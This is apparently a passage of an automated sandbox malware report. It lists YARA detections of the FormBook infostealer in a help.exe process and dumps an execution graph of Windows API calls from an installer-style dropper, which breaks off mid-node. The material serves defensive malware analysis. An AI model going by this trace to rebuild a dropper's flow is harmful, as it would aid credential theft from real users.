                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\help.exe
                                                            Imagebase:0x3b0000
                                                            File size:10240 bytes
                                                            MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            Reputation:moderate

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:15.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:16.4%
                                                              Total number of Nodes:1385
                                                              Total number of Limit Nodes:25
                                                              execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 